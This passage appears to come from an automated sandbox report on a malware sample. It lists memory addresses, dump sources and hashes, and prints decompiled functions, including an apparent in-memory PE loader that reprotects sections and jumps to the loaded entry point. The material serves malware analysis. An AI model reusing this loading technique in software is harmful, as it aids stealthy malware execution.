                                                                                                                                      0x73231c85
                                                                                                                                      0x73231c85
                                                                                                                                      0x00000000
                                                                                                                                      0x73231a02
                                                                                                                                      0x73231981
                                                                                                                                      0x73231991
                                                                                                                                      0x7323199a
                                                                                                                                      0x732319a3
                                                                                                                                      0x732319ac
                                                                                                                                      0x732319ad
                                                                                                                                      0x732319ae
                                                                                                                                      0x732319b3
                                                                                                                                      0x732319bb
                                                                                                                                      0x732319c3
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x732319c5
                                                                                                                                      0x732318f5
                                                                                                                                      0x732318fa
                                                                                                                                      0x732318fe
                                                                                                                                      0x732318fe
                                                                                                                                      0x73231902
                                                                                                                                      0x73231905
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x73231926
                                                                                                                                      0x73231928
                                                                                                                                      0x7323192c
                                                                                                                                      0x7323192e
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x73231930
                                                                                                                                      0x73231937
                                                                                                                                      0x73231943
                                                                                                                                      0x00000000
                                                                                                                                      0x73231943
                                                                                                                                      0x7323190a
                                                                                                                                      0x00000000
                                                                                                                                      0x73231a08
                                                                                                                                      0x73231a08
                                                                                                                                      0x73231a09
                                                                                                                                      0x73231a19
                                                                                                                                      0x73231a25
                                                                                                                                      0x73231a2e
                                                                                                                                      0x73231a37
                                                                                                                                      0x73231a40
                                                                                                                                      0x00000000
                                                                                                                                      0x73231a40
                                                                                                                                      0x732316ef
                                                                                                                                      0x732316f1
                                                                                                                                      0x732316f3
                                                                                                                                      0x732316f8
                                                                                                                                      0x732316fd
                                                                                                                                      0x73231710
                                                                                                                                      0x73231726
                                                                                                                                      0x7323172f
                                                                                                                                      0x73231730
                                                                                                                                      0x73231730
                                                                                                                                      0x73231732
                                                                                                                                      0x73231733
                                                                                                                                      0x73231736
                                                                                                                                      0x7323173a
                                                                                                                                      0x00000000
                                                                                                                                      0x732316f3
                                                                                                                                      0x7323168f
                                                                                                                                      0x73231699
                                                                                                                                      0x7323169a
                                                                                                                                      0x7323169a
                                                                                                                                      0x732316a7
                                                                                                                                      0x732316b3
                                                                                                                                      0x732316b5
                                                                                                                                      0x732316b7
                                                                                                                                      0x732316bb
                                                                                                                                      0x732316cb
                                                                                                                                      0x732316cb
                                                                                                                                      0x732316d2
                                                                                                                                      0x732316d5
                                                                                                                                      0x732316d6
                                                                                                                                      0x732316da
                                                                                                                                      0x732316e4
                                                                                                                                      0x00000000
                                                                                                                                      0x732316e4

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.496037557.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.495992673.0000000073220000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496245350.000000007323A000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496331831.000000007323D000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496415452.000000007323F000.00000002.00020000.sdmp Download File
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 9c8900fcd7fbf66ab59eb28a255c53a15d14c6b91febebb21f08d8104ad3c9f8
                                                                                                                                      • Instruction ID: fce7064c911503d36656bc5b16e3f0544af1942cc1b6c6a619103aecda1e73eb
                                                                                                                                      • Opcode Fuzzy Hash: 9c8900fcd7fbf66ab59eb28a255c53a15d14c6b91febebb21f08d8104ad3c9f8
                                                                                                                                      • Instruction Fuzzy Hash: EB32A3B12083459FD315EF24C880B9EBBF5FF95301F94892DE596872A0EB70E985CB52
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E73226DC8() {
                                                                                                                                      
                                                                                                                                      				 *0x7323d280 = GetUserNameW;
                                                                                                                                      				 *0x7323D284 = MessageBoxW;
                                                                                                                                      				 *0x7323D288 = GetLastError;
                                                                                                                                      				 *0x7323D28C = CreateFileA;
                                                                                                                                      				 *0x7323D290 = DebugBreak;
                                                                                                                                      				 *0x7323D294 = FlushFileBuffers;
                                                                                                                                      				 *0x7323D298 = FreeEnvironmentStringsA;
                                                                                                                                      				 *0x7323D29C = GetConsoleOutputCP;
                                                                                                                                      				 *0x7323D2A0 = GetEnvironmentStrings;
                                                                                                                                      				 *0x7323D2A4 = GetLocaleInfoA;
                                                                                                                                      				 *0x7323D2A8 = GetStartupInfoA;
                                                                                                                                      				 *0x7323D2AC = GetStringTypeA;
                                                                                                                                      				 *0x7323D2B0 = HeapValidate;
                                                                                                                                      				 *0x7323D2B4 = IsBadReadPtr;
                                                                                                                                      				 *0x7323D2B8 = LCMapStringA;
                                                                                                                                      				 *0x7323D2BC = LoadLibraryA;
                                                                                                                                      				 *0x7323D2C0 = OutputDebugStringA;
                                                                                                                                      				return 0x7323d280;
                                                                                                                                      			}



                                                                                                                                      0x73226dd9
                                                                                                                                      0x73226de1
                                                                                                                                      0x73226de4
                                                                                                                                      0x73226df3
                                                                                                                                      0x73226df6
                                                                                                                                      0x73226e05
                                                                                                                                      0x73226e08
                                                                                                                                      0x73226e17
                                                                                                                                      0x73226e1a
                                                                                                                                      0x73226e29
                                                                                                                                      0x73226e2c
                                                                                                                                      0x73226e3b
                                                                                                                                      0x73226e3e
                                                                                                                                      0x73226e4d
                                                                                                                                      0x73226e50
                                                                                                                                      0x73226e5f
                                                                                                                                      0x73226e62
                                                                                                                                      0x73226e65

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.496037557.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.495992673.0000000073220000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496245350.000000007323A000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496331831.000000007323D000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496415452.000000007323F000.00000002.00020000.sdmp Download File
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: e2e9e321bc26be636f4e5e964a8e8ca542b0f6df699fb4f8c7252ff5e24dc798
                                                                                                                                      • Instruction ID: da2fa3e018a0fd579c6948ec681ef4cb01d1f15d0b3f6381e4f8c0a8814af2a7
                                                                                                                                      • Opcode Fuzzy Hash: e2e9e321bc26be636f4e5e964a8e8ca542b0f6df699fb4f8c7252ff5e24dc798
                                                                                                                                      • Instruction Fuzzy Hash: 8E11B0BAA15600CFC398DF0AD198B917BF1BB8C310361D1AAD80D8B365D735D945EF54
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 79%
                                                                                                                                      			E7322BC00(intOrPtr* __ecx) {
                                                                                                                                      				void* _t1;
                                                                                                                                      				intOrPtr* _t4;
                                                                                                                                      
                                                                                                                                      				_t4 = __ecx;
                                                                                                                                      				_t1 = E7322C33C(__ecx);
                                                                                                                                      				if(_t1 != 0) {
                                                                                                                                      					L4:
                                                                                                                                      					return _t1;
                                                                                                                                      				} else {
                                                                                                                                      					_t1 = E73232F8C(0xa5eabdf8, 0x2c2324e8);
                                                                                                                                      					if(_t1 == 0) {
                                                                                                                                      						 *_t4 = 0;
                                                                                                                                      						goto L4;
                                                                                                                                      					} else {
                                                                                                                                      						_push( *_t4);
                                                                                                                                      						asm("int3");
                                                                                                                                      						return _t1;
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      			}





                                                                                                                                      0x7322bc01
                                                                                                                                      0x7322bc03
                                                                                                                                      0x7322bc0a
                                                                                                                                      0x7322bc29
                                                                                                                                      0x7322bc2a
                                                                                                                                      0x7322bc0c
                                                                                                                                      0x7322bc16
                                                                                                                                      0x7322bc1d
                                                                                                                                      0x7322bc23
                                                                                                                                      0x00000000
                                                                                                                                      0x7322bc1f
                                                                                                                                      0x7322bc1f
                                                                                                                                      0x7322bc21
                                                                                                                                      0x7322bc22
                                                                                                                                      0x7322bc22
                                                                                                                                      0x7322bc1d

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.496037557.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.495992673.0000000073220000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496245350.000000007323A000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496331831.000000007323D000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496415452.000000007323F000.00000002.00020000.sdmp Download File
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 229d0e70dd984517c4ff88a566391a3803afd3012da0cf9cedecb5fa3dd55369
                                                                                                                                      • Instruction ID: 5a1a7ee4957204fad237a32af97061709cd3370b765c7ac4bec5690fc44ddeed
                                                                                                                                      • Opcode Fuzzy Hash: 229d0e70dd984517c4ff88a566391a3803afd3012da0cf9cedecb5fa3dd55369
                                                                                                                                      • Instruction Fuzzy Hash: A6D012B21003436BEF151735FE00B15EBE94FC6552F69085655016B099CFE680D14060
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Executed Functions

                                                                                                                                      C-Code - Quality: 42%
                                                                                                                                      			E00EE2213(long __ebx, long __edi, void* __esi, intOrPtr* _a4) {
                                                                                                                                      				char _v20;
                                                                                                                                      				intOrPtr _v24;
                                                                                                                                      				intOrPtr _v28;
                                                                                                                                      				intOrPtr _v32;
                                                                                                                                      				intOrPtr _v36;
                                                                                                                                      				intOrPtr _v40;
                                                                                                                                      				char _v44;
                                                                                                                                      				intOrPtr* _v48;
                                                                                                                                      				intOrPtr _v52;
                                                                                                                                      				intOrPtr _v56;
                                                                                                                                      				intOrPtr _v60;
                                                                                                                                      				intOrPtr _v64;
                                                                                                                                      				intOrPtr _v68;
                                                                                                                                      				void* _v72;
                                                                                                                                      				char* _v76;
                                                                                                                                      				int _v80;
                                                                                                                                      				long _v84;
                                                                                                                                      				long _v88;
                                                                                                                                      				DWORD* _v92;
                                                                                                                                      				intOrPtr _v96;
                                                                                                                                      				int _v100;
                                                                                                                                      				intOrPtr* _v104;
                                                                                                                                      				intOrPtr _v108;
                                                                                                                                      				intOrPtr _v112;
                                                                                                                                      				intOrPtr _v116;
                                                                                                                                      				void* _v120;
                                                                                                                                      				intOrPtr _v124;
                                                                                                                                      				intOrPtr _v128;
                                                                                                                                      				intOrPtr _v132;
                                                                                                                                      				intOrPtr _v136;
                                                                                                                                      				char* _v140;
                                                                                                                                      				intOrPtr _v144;
                                                                                                                                      				intOrPtr _v148;
                                                                                                                                      				intOrPtr _v152;
                                                                                                                                      				intOrPtr _v156;
                                                                                                                                      				intOrPtr _v160;
                                                                                                                                      				intOrPtr _v164;
                                                                                                                                      				int _v168;
                                                                                                                                      				char* _v172;
                                                                                                                                      				intOrPtr _v176;
                                                                                                                                      				intOrPtr _v180;
                                                                                                                                      				char _v184;
                                                                                                                                      				intOrPtr* _t136;
                                                                                                                                      				int _t143;
                                                                                                                                      				int _t151;
                                                                                                                                      				int _t155;
                                                                                                                                      				intOrPtr _t170;
                                                                                                                                      				int _t177;
                                                                                                                                      				void* _t226;
                                                                                                                                      				intOrPtr _t229;
                                                                                                                                      				intOrPtr _t234;
                                                                                                                                      				void* _t236;
                                                                                                                                      				intOrPtr* _t240;
                                                                                                                                      				intOrPtr _t247;
                                                                                                                                      				intOrPtr _t251;
                                                                                                                                      				DWORD* _t264;
                                                                                                                                      				void* _t268;
                                                                                                                                      				intOrPtr* _t271;
                                                                                                                                      				intOrPtr* _t272;
                                                                                                                                      
                                                                                                                                      				_t136 = _a4;
                                                                                                                                      				_v20 = 0;
                                                                                                                                      				_t236 =  *((intOrPtr*)(_t136 + 0x40));
                                                                                                                                      				 *0xee4418 = 1;
                                                                                                                                      				asm("movaps xmm0, [0xee3010]");
                                                                                                                                      				asm("movups [0xee4428], xmm0");
                                                                                                                                      				_v48 = _t136;
                                                                                                                                      				_v52 =  *((intOrPtr*)(_t136 + 0x64));
                                                                                                                                      				_v56 =  *((intOrPtr*)(_v48 + 8));
                                                                                                                                      				_v184 = _t236;
                                                                                                                                      				_v60 =  *((intOrPtr*)(_v48 + 0x50));
                                                                                                                                      				_v180 = _v52;
                                                                                                                                      				_v176 = 4;
                                                                                                                                      				_v172 =  &_v20;
                                                                                                                                      				_v64 =  *((intOrPtr*)(_t136 + 0x60));
                                                                                                                                      				_v68 = 4;
                                                                                                                                      				_v72 = _t236;
                                                                                                                                      				_v76 =  &_v20;
                                                                                                                                      				_t143 = VirtualProtect(__esi, __edi, __ebx, _t264); // executed
                                                                                                                                      				_v80 = _t143;
                                                                                                                                      				_v184 = _v72;
                                                                                                                                      				_v180 = 0;
                                                                                                                                      				_v176 =  *((intOrPtr*)(_v48 + 0x64));
                                                                                                                                      				_v84 = 0x400;
                                                                                                                                      				_v88 = 2;
                                                                                                                                      				_v92 =  &_v20;
                                                                                                                                      				_v96 = 0;
                                                                                                                                      				E00EE2569();
                                                                                                                                      				E00EE1D28(_v72,  *((intOrPtr*)(_v48 + 0xc)), _v56);
                                                                                                                                      				E00EE2569( *((intOrPtr*)(_v48 + 0xc)), 0, _v56);
                                                                                                                                      				_t151 = VirtualProtect(_v72, 0x400, 2, _v92); // executed
                                                                                                                                      				_t271 = _t268 - 0x88;
                                                                                                                                      				_t226 = _v72;
                                                                                                                                      				_t251 =  *((intOrPtr*)(_t226 + 0x3c));
                                                                                                                                      				_v100 = _t151;
                                                                                                                                      				_v104 = _v72 + 0x3c;
                                                                                                                                      				_v108 = _t226;
                                                                                                                                      				_v112 = _t251;
                                                                                                                                      				if(_t251 != 0) {
                                                                                                                                      					_v108 = _v72 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
                                                                                                                                      				}
                                                                                                                                      				_v144 = _v108;
                                                                                                                                      				if(_v60 != 0) {
                                                                                                                                      					_v148 = 0;
                                                                                                                                      					_v152 = _v144 + 0x18 + ( *(_v144 + 0x14) & 0x0000ffff);
                                                                                                                                      					while(1) {
                                                                                                                                      						_t170 = _v152;
                                                                                                                                      						_v160 = _t170;
                                                                                                                                      						_t247 = _v160;
                                                                                                                                      						_v184 = _v72 +  *((intOrPtr*)(_t247 + 0xc));
                                                                                                                                      						_v180 =  *((intOrPtr*)(_t247 + 8));
                                                                                                                                      						_v176 =  *((intOrPtr*)(0xee4418 + (( *(_t170 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t170 + 0x24) >> 0x1f << 3) + (( *(_t170 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
                                                                                                                                      						_v172 =  &_v20;
                                                                                                                                      						_v164 = _v148;
                                                                                                                                      						_t177 = VirtualProtect(??, ??, ??, ??); // executed
                                                                                                                                      						_t271 = _t271 - 0x10;
                                                                                                                                      						_t234 = _v164 + 1;
                                                                                                                                      						_v168 = _t177;
                                                                                                                                      						_v148 = _t234;
                                                                                                                                      						_v152 = _v160 + 0x28;
                                                                                                                                      						if(_t234 == _v60) {
                                                                                                                                      							goto L9;
                                                                                                                                      						}
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				L9:
                                                                                                                                      				 *_t271 = _v72;
                                                                                                                                      				_v124 = _v72 +  *((intOrPtr*)(_v48 + 0x24));
                                                                                                                                      				_t155 = DisableThreadLibraryCalls(??);
                                                                                                                                      				_t272 = _t271 - 4;
                                                                                                                                      				_t229 =  *_v104;
                                                                                                                                      				_v156 = _t155;
                                                                                                                                      				_v116 = _t229;
                                                                                                                                      				_v120 = _v72;
                                                                                                                                      				if(_t229 != 0) {
                                                                                                                                      					_v120 = _v72 + (_v116 + 0x0000ffff & 0x0000ffff) + 1;
                                                                                                                                      				}
                                                                                                                                      				_t240 = _v48;
                                                                                                                                      				_v44 =  *((intOrPtr*)(_t240 + 0x20));
                                                                                                                                      				_v40 =  *((intOrPtr*)(_t240 + 0x18));
                                                                                                                                      				_v36 =  *((intOrPtr*)(_t240 + 0x34));
                                                                                                                                      				_v32 =  *((intOrPtr*)(_t240 + 0x30));
                                                                                                                                      				_v28 =  *_t240;
                                                                                                                                      				_v24 = _v124;
                                                                                                                                      				 *_t272 = _t240;
                                                                                                                                      				_v184 = 0;
                                                                                                                                      				_v180 = 0x74;
                                                                                                                                      				_v128 =  *((intOrPtr*)(_v120 + 0x28));
                                                                                                                                      				_v132 = 0;
                                                                                                                                      				_v136 = 0x74;
                                                                                                                                      				_v140 =  &_v44;
                                                                                                                                      				E00EE2569();
                                                                                                                                      				if(_v128 != 0) {
                                                                                                                                      					_t272 =  *((intOrPtr*)( &_v44 + 0x10));
                                                                                                                                      					goto __eax;
                                                                                                                                      				}
                                                                                                                                      				return 1;
                                                                                                                                      			}






























































                                                                                                                                      0x00ee221f
                                                                                                                                      0x00ee222d
                                                                                                                                      0x00ee2234
                                                                                                                                      0x00ee2237
                                                                                                                                      0x00ee2241
                                                                                                                                      0x00ee2248
                                                                                                                                      0x00ee2252
                                                                                                                                      0x00ee2258
                                                                                                                                      0x00ee2261
                                                                                                                                      0x00ee226a
                                                                                                                                      0x00ee226d
                                                                                                                                      0x00ee2273
                                                                                                                                      0x00ee2277
                                                                                                                                      0x00ee227f
                                                                                                                                      0x00ee2283
                                                                                                                                      0x00ee2286
                                                                                                                                      0x00ee2289
                                                                                                                                      0x00ee228c
                                                                                                                                      0x00ee228f
                                                                                                                                      0x00ee22a9
                                                                                                                                      0x00ee22af
                                                                                                                                      0x00ee22b2
                                                                                                                                      0x00ee22ba
                                                                                                                                      0x00ee22be
                                                                                                                                      0x00ee22c1
                                                                                                                                      0x00ee22c4
                                                                                                                                      0x00ee22c7
                                                                                                                                      0x00ee22ca
                                                                                                                                      0x00ee22e6
                                                                                                                                      0x00ee2303
                                                                                                                                      0x00ee2328
                                                                                                                                      0x00ee232a
                                                                                                                                      0x00ee2333
                                                                                                                                      0x00ee2336
                                                                                                                                      0x00ee2340
                                                                                                                                      0x00ee2343
                                                                                                                                      0x00ee2346
                                                                                                                                      0x00ee2349
                                                                                                                                      0x00ee234c
                                                                                                                                      0x00ee23a4
                                                                                                                                      0x00ee23a4
                                                                                                                                      0x00ee254a
                                                                                                                                      0x00ee2550
                                                                                                                                      0x00ee244d
                                                                                                                                      0x00ee2453
                                                                                                                                      0x00ee249f
                                                                                                                                      0x00ee249f
                                                                                                                                      0x00ee24bc
                                                                                                                                      0x00ee24e2
                                                                                                                                      0x00ee24f0
                                                                                                                                      0x00ee24f3
                                                                                                                                      0x00ee24f7
                                                                                                                                      0x00ee24fb
                                                                                                                                      0x00ee2502
                                                                                                                                      0x00ee2508
                                                                                                                                      0x00ee250a
                                                                                                                                      0x00ee251c
                                                                                                                                      0x00ee2524
                                                                                                                                      0x00ee252a
                                                                                                                                      0x00ee2530
                                                                                                                                      0x00ee2536
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00ee253c
                                                                                                                                      0x00ee249f
                                                                                                                                      0x00ee245b
                                                                                                                                      0x00ee2469
                                                                                                                                      0x00ee2471
                                                                                                                                      0x00ee2474
                                                                                                                                      0x00ee2476
                                                                                                                                      0x00ee247c
                                                                                                                                      0x00ee2488
                                                                                                                                      0x00ee248e
                                                                                                                                      0x00ee2491
                                                                                                                                      0x00ee2494
                                                                                                                                      0x00ee238a
                                                                                                                                      0x00ee238a
                                                                                                                                      0x00ee23d8
                                                                                                                                      0x00ee23de
                                                                                                                                      0x00ee23e4
                                                                                                                                      0x00ee23ea
                                                                                                                                      0x00ee23f0
                                                                                                                                      0x00ee23f5
                                                                                                                                      0x00ee23fb
                                                                                                                                      0x00ee23fe
                                                                                                                                      0x00ee2401
                                                                                                                                      0x00ee2409
                                                                                                                                      0x00ee2411
                                                                                                                                      0x00ee2414
                                                                                                                                      0x00ee2417
                                                                                                                                      0x00ee241d
                                                                                                                                      0x00ee2423
                                                                                                                                      0x00ee242e
                                                                                                                                      0x00ee2362
                                                                                                                                      0x00ee2368
                                                                                                                                      0x00ee2368
                                                                                                                                      0x00ee23c5

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.493506014.0000000000EE0000.00000040.00000001.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                      • String ID: t
                                                                                                                                      • API String ID: 544645111-2238339752
                                                                                                                                      • Opcode ID: 3226e700619c600dfe29c2a92eba82ca6a137c912ccf91dc75e88c1719d708ea
                                                                                                                                      • Instruction ID: 23bf76516286b475f2df40b77315f219647afb53728b17c8de84dd087c64f242
                                                                                                                                      • Opcode Fuzzy Hash: 3226e700619c600dfe29c2a92eba82ca6a137c912ccf91dc75e88c1719d708ea
                                                                                                                                      • Instruction Fuzzy Hash: E2819AB4E042098FCB04CFA9C580A9DFBF1FF48310F65856AE958AB361D734A985CF91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.493506014.0000000000EE0000.00000040.00000001.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                      • Opcode ID: 8e415037fb658ad91878dd600cc177924c531f3d37b982e525389e3be2a51a65
                                                                                                                                      • Instruction ID: c35c42bd7f124a63e9be20aba49b0c868609e45d779aaf9e993cc75d4b3bddc0
                                                                                                                                      • Opcode Fuzzy Hash: 8e415037fb658ad91878dd600cc177924c531f3d37b982e525389e3be2a51a65
                                                                                                                                      • Instruction Fuzzy Hash: 7031D6B5E002298FDB24CF69C98069DB7F1BF88304F268699D959B7346D731AE41CF81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.493506014.0000000000EE0000.00000040.00000001.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                      • Opcode ID: 0b9b42ba2fdb08c7cefa25f605df8f332aac007ccc48bea5617a17140e49e517
                                                                                                                                      • Instruction ID: bc578a9213d5015601c474b80ba6e19d5e88ea91d1bb75a54648f852fce05667
                                                                                                                                      • Opcode Fuzzy Hash: 0b9b42ba2fdb08c7cefa25f605df8f332aac007ccc48bea5617a17140e49e517
                                                                                                                                      • Instruction Fuzzy Hash: 0341D3B5E052198FDB08DFA9C4906AEBBF1FF48714F15856EE849AB340D735A880CF94
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Non-executed Functions